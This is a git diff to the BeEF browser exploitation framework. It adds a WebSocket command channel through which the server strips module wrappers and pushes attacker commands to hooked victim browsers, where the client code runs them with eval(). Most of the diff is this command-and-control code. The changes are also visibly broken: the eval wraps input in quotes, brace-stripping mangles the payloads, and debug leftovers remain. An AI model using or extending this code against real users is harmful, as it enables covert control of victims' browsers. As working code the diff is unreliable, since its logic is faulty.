diff --git a/config.yaml b/config.yaml index bd913a9fe..baca65fa8 100644 --- a/config.yaml +++ b/config.yaml @@ -38,7 +38,7 @@ beef: hook_session_name: "BEEFHOOK" session_cookie_name: "BEEFSESSION" websocket: - enable: false + enable: true secure: false # use WebSocketSecure port: 11989 diff --git a/core/main/client/updater.js b/core/main/client/updater.js index a3cb1e0d7..3aedee96b 100644 --- a/core/main/client/updater.js +++ b/core/main/client/updater.js @@ -23,7 +23,7 @@ beef.updater = { // Low timeouts combined with the way the framework sends commamd modules result // in instructions being sent repeatedly or complex code. // If you suffer from ADHD, you can decrease this setting. - timeout: 1000, + timeout: 5000, // A lock. lock: false, diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js index 547809ebc..e0e17ec82 100644 --- a/core/main/client/websocket.js +++ b/core/main/client/websocket.js @@ -47,9 +47,11 @@ beef.websocket = { } this.socket.onmessage = function (message){ //@todo append the command to head in - console.log("We recive a message "+message.data); + console.log("We recive a message ' "+message.data+"'"); + eval("'"+message.data +"'"); - } + /*END POC*/ + } }, diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb index d8d189914..e82d9b5fc 100644 --- a/core/main/handlers/modules/command.rb +++ b/core/main/handlers/modules/command.rb @@ -50,11 +50,31 @@ module BeEF build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty? let= BeEF::Core::Websocket::Websocket.instance #@todo radoen debug this one - exist= let.getsocket(hooked_browser.session) - if exist != nil - let.sent(command_module.output, hooked_browser.session) + if let.getsocket(hooked_browser.session) + + funtosend=command_module.output.gsub("beef.execute(function()","") + funtosend=funtosend.gsub("});", "") + funtosend=funtosend.gsub("{", "") + funtosend=funtosend.gsub('// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +//',"") + let.sent(funtosend, hooked_browser.session) + print_info("We are sending #{funtosend}") else + print_info("not in else") @body << command_module.output + "\n\n" end diff --git a/core/main/network_stack/websocket/websocket.rb b/core/main/network_stack/websocket/websocket.rb index f9453c1f9..b52b48be7 100644 --- a/core/main/network_stack/websocket/websocket.rb +++ b/core/main/network_stack/websocket/websocket.rb @@ -27,7 +27,6 @@ module BeEF def initialize - print_info("/n In activesocket we have #{@@activeSocket}") config = BeEF::Core::Configuration.instance port = config.get("beef.http.websocket.port") secure = config.get("beef.http.websocket.secure") @@ -50,7 +49,7 @@ module BeEF if(/BEEFHOOK=/.match(message)) print_info("Browser #{ws.origin} says helo! ws is running") #insert new connection in activesocket - @@activeSocket["#{message.split(/BEEFHOOK=/)}"] = ws + @@activeSocket["#{message.split(/BEEFHOOK=/)[1]}"] = ws print_debug("In activesocket we have #{@@activeSocket}") end end @@ -60,7 +59,11 @@ module BeEF end #@note used in command.rd return nill if browser is not in list else giveback websocket def getsocket (browser_id) - @@activeSocket[browser_id] + if ( @@activeSocket[browser_id] != nil) + true + else + false + end end #@note send a function to hooked and ws browser def sent (fn ,browser_id )